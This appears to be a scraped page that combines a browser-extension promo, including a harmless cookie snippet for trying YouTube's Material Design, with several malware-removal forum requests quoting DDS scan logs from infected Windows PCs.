Support the development of Flash® Player for YouTube

If you have already rated and reviewed this extension but want to do more you can make a donation below, any amount is appreciated!
Amount: Currency: Improve your user experience on YouTube

My other extension, Enhancer for YouTube, has all the features you need to improve your user experience on YouTube. It is used by hundreds of thousands users who have rated it 4.74/5 and who have posted hundreds of positive reviews. It is really easy to use and allows you to control volume level and playback speed with the mouse wheel, remove ads from videos (automatically or on-demand), remove annotations, disable autoplay and preloading for videos loaded in background tabs, automatically play videos in HD or any other format, loop videos (in part or in whole), and much more... So take a few seconds to try it, it's really worth it!
How to try out the Material Design version of YouTube

Note: The Material Design version is still in development. If you don't see the new version after having followed these instructions it means that YouTube refuses to let you try it out.

Right-click on the following link and select Open link in incognito window from the context menu: https://www.youtube.com/?hl=US&gl=US
Open the Developers Tools in the incognito window by pressing F12 on your keyboard.
Select the Application tab, expand the Storage > Cookies menu in the left column, right-click on https://www.youtube.com and click on Clear to delete cookies (see image below).
Copy the following code: document.cookie="VISITOR_INFO1_LIVE=xc20BSxO5Uc; path=/; domain=.youtube.com";window.location.reload();
Select the Console tab, click on the blue arrow or in the blank area, paste the code copied above, then press Enter on your keyboard (see image below).
Close the Developers Tools by pressing F12 on your keyboard.

That's it, you should be able to try out the new version of YouTube before it is released to the public!
-----
The Developer

↧

Your TV Link

December 29, 2016, 1:34 am

≫ Next: Sent here by Corday

≪ Previous: Flash® Player for YouTube has been updated

All my browsers are infected with Yourtv.link, which redirect pages and block normal browsers behavior. I do scan with Malwarebytes Anti-Malware and AdwerCleaner, they both find it, but cleaning doesn't fix problem. Just as I open any browser, he is back. Here are log files, if this could be some help

https://www.sendspace.com/file/gbkmn5

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 11.111.2
Run by Suad at 10:10:20 on 2016-12-29
Microsoft Windows XP Professional 5.1.2600.3.1250.381.1033.18.1527.607 [GMT 1:00]
.
AV: Avira Antivirus *Enabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
============== Running Processes ================
.
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\Antivirus\sched.exe
C:\Documents and Settings\Suad\Application Data\AVAST Software\Browser Cleanup\BCUSched.exe
C:\Program Files\Avira\Antivirus\avguard.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\ThpSrv.exe
C:\Program Files\TOSHIBA\TME3\Tmesrv31.exe
C:\Program Files\Avira\Launcher\Avira.ServiceHost.exe
C:\Program Files\Avira\Antivirus\avshadow.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\SkyTel.EXE
C:\WINDOWS\system32\00THotkey.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\thpsrv.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\Wireless Hotkey\TosHKCW.exe
C:\WINDOWS\System32\DLA\DLACTRLW.EXE
C:\Program Files\TOSHIBA\TME3\TMEEJME.EXE
C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\WINDOWS\system32\igfxext.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\Avira\Antivirus\avgnt.exe
C:\Program Files\Avira\Launcher\Avira.Systray.exe
C:\Documents and Settings\Suad\Application Data\uTorrent\uTorrent.exe
C:\Program Files\Internet Download Manager\IDMan.exe
C:\Documents and Settings\Suad\Application Data\uTorrent\updates\3.4.9_43085\utorrentie.exe
C:\Documents and Settings\Suad\Application Data\uTorrent\updates\3.4.9_43085\utorrentie.exe
C:\Program Files\Internet Download Manager\IEMonitor.exe
C:\Program Files\CCleaner\CCleaner.exe
C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
C:\Documents and Settings\All Users\iobakf\iobakf.exe
C:\Program Files\EmEditor\emedtray.exe
C:\WINDOWS\system32\OSK.exe
C:\WINDOWS\system32\MSSWCHX.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k imgsvc
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://yourtv.link
uSearch Bar = hxxps://www.google.com/?bcutc=sp-004-752
uSearch Page = hxxps://www.google.com/search?bcutc=sp-004-752&q={searchTerms}
mStart Page = hxxps://www.google.com/?bcutc=sp-004-752
mSearch Bar = hxxps://www.google.com/?bcutc=sp-004-752
mSearch Page = hxxps://www.google.com/search?bcutc=sp-004-752&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class): {0055C089-8582-441B-A0BF-17B458C2A3A8} - c:\program files\internet download manager\IDMIECC.dll
BHO: DriveLetterAccess: {5CA3D70E-1895-11CF-8E15-001234567890} - c:\windows\system32\dla\DLASHX_W.DLL
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre1.8.0_111\bin\ssv.dll
BHO: Windows Live Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre1.8.0_111\bin\jp2ssv.dll
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
uRun: [uTorrent] "c:\documents and settings\suad\application data\utorrent\uTorrent.exe" /MINIMIZED
uRun: [Adobe Reader Synchronizer] "c:\program files\adobe\reader 11.0\reader\AdobeCollabSync.exe"
uRun: [IDMan] c:\program files\internet download manager\IDMan.exe /onboot
uRun: [CCleaner Monitoring] "c:\program files\ccleaner\CCleaner.exe" /MONITOR
uRun: [iobakf.exe] c:\documents and settings\all users\iobakf\iobakf.exe
mRun: [SkyTel] SkyTel.EXE
mRun: [00THotkey] c:\windows\system32\00THotkey.exe
mRun: [000StTHK] 000StTHK.exe
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [AGRSMMSG] AGRSMMSG.exe
mRun: [TPSODDCtl] TPSODDCtl.exe
mRun: [ThpSrv] thpsrv /logon
mRun: [TFNF5] TFNF5.exe
mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe
mRun: [TOSDCR] TOSDCR.EXE
mRun: [TMESRV.EXE] c:\program files\toshiba\tme3\TMESRV31.EXE /Logon
mRun: [TosHKCW.exe] "c:\program files\toshiba\wireless hotkey\TosHKCW.exe"
mRun: [DLA] c:\windows\system32\dla\DLACTRLW.EXE
mRun: [IntelZeroConfig] "c:\program files\intel\wireless\bin\ZCfgSvc.exe"
mRun: [IntelWireless] "c:\program files\intel\wireless\bin\ifrmewrk.exe" /tf Intel PROSet/Wireless
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [avgnt] "c:\program files\avira\antivirus\avgnt.exe" /min
mRun: [Avira SystrayStartTrigger] c:\program files\avira\launcher\Avira.SystrayStartTrigger.exe
dRun: [CTFMON.EXE] c:\windows\system32\CTFMON.EXE
StartupFolder: c:\docume~1\suad\startm~1\programs\startup\emeditor.lnk - c:\program files\emeditor\emedtray.exe
StartupFolder: c:\docume~1\suad\startm~1\programs\startup\micros~1.lnk - c:\program files\microsoft office\office11\ONENOTEM.EXE
StartupFolder: c:\docume~1\suad\startm~1\programs\startup\suad.lnk - c:\documents and settings\all users\iobakf\iobakf.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
uPolicies-Explorer: NoDriveAutoRun = dword:67108863
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
IE: Download all links with IDM - c:\program files\internet download manager\IEGetAll.htm
IE: Download with IDM - c:\program files\internet download manager\IEExt.htm
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
Trusted Zone: localhost
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_67-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0067-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_67-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_67-windows-i586.cab
TCP: Interfaces\{3D613E94-4D96-4B66-A027-6D91900CFB7C} : NameServer = 8.8.8.8 4.2.2.2
TCP: Interfaces\{DC1F581B-B8C1-4CD4-8530-19D911DCD677} : NameServer = 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\49.0.2623.112\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
Hosts: 0.0.0.0 fr.a2dfp.net
Hosts: 0.0.0.0 m.fr.a2dfp.net
Hosts: 0.0.0.0 mfr.a2dfp.net
Hosts: 0.0.0.0 ad.a8.net
Hosts: 0.0.0.0 asy.a8ww.net
.
Note: multiple HOSTS entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\suad\application data\mozilla\firefox\profiles\aex6lj8q.default-1473001184500\
FF - prefs.js: browser.search.defaulturl - hxxps://www.google.com/search?bcutc=sp-004-752
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - hxxp://yourtv.link
FF - prefs.js: keyword.URL - hxxps://www.google.com/search?bcutc=sp-004-752
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\google\update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\nokia\nokia suite\npNokiaSuiteEnabler.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 Thpdrv;TOSHIBA HDD Protection Driver;c:\windows\system32\drivers\thpdrv.sys [2004-12-27 16384]
R0 Thpevm;TOSHIBA HDD Protection - Shock Sensor Driver;c:\windows\system32\drivers\Thpevm.sys [2006-6-6 6144]
R1 avkmgr;avkmgr;c:\windows\system32\drivers\avkmgr.sys [2015-8-8 37896]
R1 IDMTDI;IDMTDI;c:\windows\system32\drivers\idmtdi.sys [2016-1-28 140936]
R1 TMEI3E;TMEI3E;c:\windows\system32\drivers\TMEI3E.SYS [2006-6-6 5888]
R2 AntiVirSchedulerService;Avira Scheduler;c:\program files\avira\antivirus\sched.exe [2015-8-8 470600]
R2 AntiVirService;Avira Real-Time Protection;c:\program files\avira\antivirus\avguard.exe [2015-8-8 470600]
R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2015-8-8 115600]
R2 Avira.ServiceHost;Avira Service Host;c:\program files\avira\launcher\Avira.ServiceHost.exe [2016-7-11 309384]
R2 Skype C2C Service;Skype C2C Service;c:\documents and settings\all users\application data\skype\toolbars\skype c2c service\c2c_service.exe [2013-10-9 3275136]
R2 Tmesrv;Tmesrv3;c:\program files\toshiba\tme3\TMESRV31.EXE [2006-6-6 114688]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-10-2 24448]
R3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2013-7-20 754856]
S2 AntiVirWebService;Avira Web Protection;c:\program files\avira\antivirus\avwebgrd.exe [2016-10-25 1253352]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 MBAMService;MBAMService;c:\program files\malwarebytes anti-malware\mbamservice.exe [2014-4-8 1136608]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2016-9-20 324224]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [2014-1-5 1691480]
S3 anvsnddrv;AnvSoft Virtual Sound Device;c:\windows\system32\drivers\anvsnddrv.sys --> c:\windows\system32\drivers\anvsnddrv.sys [?]
S3 IFXTPM;IFXTPM;c:\windows\system32\drivers\ifxtpm.sys [2006-6-6 35968]
S3 Revoflt;Revoflt;c:\windows\system32\drivers\revoflt.sys [2016-2-23 27064]
S4 AntiVirMailService;Avira Mail Protection;c:\program files\avira\antivirus\avmailc.exe [2016-10-25 970632]
S4 MBAMScheduler;MBAMScheduler;c:\program files\malwarebytes anti-malware\mbamscheduler.exe [2014-4-8 1514464]
.
=============== File Associations ===============
.
FileExt: .txt: emeditor.txt="c:\program files\emeditor\EMEDITOR.EXE" "%1"
.js: <filetype is not registered>
ShellExec: opera.exe: open="c:\program files\opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2016-12-29 09:04:33 -------- d-----w- c:\documents and settings\all users\application data\Estsoft
2016-12-27 19:54:02 -------- d-----w- c:\documents and settings\suad\application data\AVAST Software
2016-12-27 12:46:32 -------- d-----w- C:\2-click run
2016-12-26 17:12:38 -------- d-sh--w- c:\documents and settings\all users\Mozilla
2016-12-20 09:19:46 -------- d-sh--w- c:\documents and settings\all users\Windows XP
2016-12-20 09:05:38 -------- d-sh--w- c:\documents and settings\all users\iobakf
2016-12-14 08:02:58 3709120 ----a-w- c:\program files\mozilla firefox\d3dcompiler_47.dll
.
==================== Find3M ====================
.
2016-12-29 07:39:39 170200 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-12-21 12:16:43 802904 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2016-12-21 12:16:42 144472 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2016-11-22 09:07:17 95808 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
2016-11-22 09:07:09 160256 ----a-w- c:\windows\system32\javacpl.cpl
2016-11-08 21:30:09 5001920 ----a-w- c:\windows\system32\FlashPlayerInstaller.exe
.
============= FINISH: 10:17:24,78 ===============

I supose pick up this thing on well known bulgarien torrent site.

Attached Files

attach.txt (519.6 KB)

↧

Sent here by Corday

January 1, 2017, 9:38 am

≫ Next: Possible Malware/Adware

≪ Previous: Your TV Link

I was instructed to come here and get checked.
I have been working with Corday on a failure to update issue. Last evening he gave me an update KB3204723 and as soon as it rebooted after install the alert bubble over the updates icon on the taskbar said to look for updates. I postede that and this morning he suggested I come here to get rechecked. I had a check last week after MWB found some virus. I never deleted them from MWB but they were gone when that check here was done.
The way it usually works on my machine is that it auto finds updates and then that icon appears when it finds some. In the last few months the icon is always there and when I click it the updates window tells me to look for updates instead of having updates ready.

I have the system discs I made per instructions when I first booted the machine.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16819 BrowserJavaVersion: 11.111.2
Run by Me at 9:34:29 on 2017-01-01
Microsoft® Windows Vista Home Premium 6.0.6002.2.1252.1.1033.18.3963.1902 [GMT -8:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {71A27EC9-3DA6-45FC-60A7-004F623C6189}
SP: Microsoft Security Essentials *Enabled/Updated* {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Windows\RAVCpl64.exe
C:\Windows\System32\igfxpers.exe
C:\Windows\System32\hkcmd.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\wuauclt.exe
c:\Program Files\Microsoft Security Client\MpCmdRun.exe
c:\Program Files\Microsoft Security Client\MpCmdRun.exe
C:\Windows\splwow64.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
BHO: Ghostery Plugin: {6BF739DD-3323-4C6A-975B-C7E00A50B154} - C:\Program Files (x86)\Ghostery\bin\ghostery.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
mRun: [NDSTray.exe] NDSTray.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MICROS~1.LNK - C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0045-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86} : DHCPNameServer = 75.75.75.75 75.75.76.76
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
x64-Run: [TPwrMain] C:\Program Files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
x64-Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SmoothView] C:\Program Files (x86)\Toshiba\SmoothView\SmoothView.exe
x64-Run: [Skytel] Skytel.exe
x64-Run: [RtHDVCpl] RAVCpl64.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HSON] C:\Program Files (x86)\TOSHIBA\TBS\HSON.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [00TCrdMain] C:\Program Files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-Explorer: NoDrives = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2016-8-25 295000]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\Windows\System32\drivers\tos_sps64.sys [2015-5-9 504912]
R1 JSWPSLWF;JumpStart Wireless Filter Driver;C:\Windows\System32\drivers\jswpslwfx.sys [2015-5-9 26624]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 27648]
R3 FwLnk;FwLnk Driver;C:\Windows\System32\drivers\FwLnk.sys [2008-8-18 8704]
R3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2016-8-25 135928]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2016-11-14 361816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2016-8-1 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2016-8-1 124088]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2008-1-20 19968]
S3 PSMounterEx;Macrium Reflect Image Explorer Driver;C:\Windows\System32\drivers\psmounterex.sys [2015-4-2 169992]
S3 PSVolAcc;PSVolAcc;C:\Windows\System32\drivers\PSVolAcc.sys [2014-7-21 12760]
S3 WIMMount;WIMMount;C:\Program Files\Macrium\Reflect\wimmount.sys [2015-5-14 22096]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2016-8-1 25800]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2015-5-10 90776]
S4 ConfigFree Gadget Service;ConfigFree Gadget Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFProcSRVC.exe [2008-4-3 36864]
S4 ConfigFree Service;ConfigFree Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFSvcs.exe [2008-4-16 40960]
S4 jswpsapi;Jumpstart Wifi Protected Setup;C:\Program Files (x86)\Jumpstart\jswpsapi.exe [2015-5-9 954368]
S4 KR10I64;KR10I64;C:\Windows\System32\drivers\KR10I64.sys [2008-8-18 248320]
S4 KR10N64;KR10N64;C:\Windows\System32\drivers\KR10N64.sys [2008-8-18 237568]
S4 ReflectService.exe;Macrium Reflect Image Mounting Service;C:\Program Files\Macrium\Reflect\ReflectService.exe [2014-7-21 3272656]
S4 SmartFaceVWatchSrv;SmartFaceVWatchSrv;C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [2008-4-24 84992]
S4 TMachInfo;TMachInfo;C:\Program Files (x86)\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2008-8-18 46392]
S4 TOSHIBA SMART Log Service;TOSHIBA SMART Log Service;C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [2007-12-3 175104]
.
=============== File Associations ===============
.
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2016-12-30 23:49:06 192216 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2016-12-13 19:04:42 802904 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2016-12-13 19:04:42 144472 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2016-11-08 15:49:57 2804736 ----a-w- C:\Windows\System32\win32k.sys
2016-11-02 16:16:24 383208 ----a-w- C:\Windows\System32\atmfd.dll
2016-11-02 16:09:14 48128 ----a-w- C:\Windows\System32\atmlib.dll
2016-11-02 16:06:50 306408 ----a-w- C:\Windows\SysWow64\atmfd.dll
2016-11-02 15:59:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2016-10-28 01:22:26 485032 ------w- C:\Windows\System32\MpSigStub.exe
2016-10-19 17:24:56 97856 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2016-10-04 14:41:48 90112 ----a-w- C:\Windows\System32\drivers\bowser.sys
.
============= FINISH: 9:35:03.20 ===============

Attached Files

attach.txt (15.9 KB)

↧

Possible Malware/Adware

January 5, 2017, 12:55 pm

≫ Next: Two Pesky Virus I cannot remove - Win.Trojan.Agent-5331045-0 HELP......

≪ Previous: Sent here by Corday

I'm running Windows 8.1, and primarily use Google Chrome to access the internet. Sometimes my browser will redirect to a random survey site out of nowhere. I've run a virus scan using AVG and a malware scan using MalwareBytes, but neither have detected or removed the problem.

I was unable to download and run DDS so I downloaded and ran Farberware Recovery and Scan Tool instead, and have attached the two txt files the scan produced.

Attached Files

	FRST.txt (50.8 KB)
	Addition.txt (42.9 KB)

↧

Two Pesky Virus I cannot remove - Win.Trojan.Agent-5331045-0 HELP......

January 6, 2017, 8:54 am

≫ Next: Crazy ad sound in background!

≪ Previous: Possible Malware/Adware

Hello,

Need a little assistance in two viruses that keep coming up in ClamWIN scans.

These two files get flagged each time I run this scan:
